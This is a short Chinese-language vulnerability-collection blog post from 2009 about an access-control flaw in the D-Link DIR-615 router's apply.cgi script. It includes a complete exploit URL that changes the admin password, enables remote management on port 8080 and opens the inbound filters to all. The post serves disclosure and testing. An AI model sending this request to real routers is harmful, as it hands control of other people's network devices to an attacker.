存档

文章标签 ‘D-Link’

D-Link DIR-615 脚本绕过安全限制漏洞

2009年12月23日 没有评论

受影响的版本:
D-Link DIR-615

漏洞文件:
apply.cgi

Link DIR-615是一款小型的无线路由器。

        DIR-615路由器没有限制对apply.cgi脚本的访问,远程攻击者可以通过求请求某些URL执行各种攻击,包括更改管理员口令、禁用无线安全或更改DNS设置。

测试方法:

http://localhost/apply.cgi?admin_password=pwdpwd&admin_password1=pwdpwd&admPass2=
pwdpwd&remote_enable=1&remote_http_management_enable=
1&remote_http_management_port=8080&remote_inbound_filter=
Allow_All&remote_http_management_inbound_filter=Allow_All

分类: 漏洞收集 标签: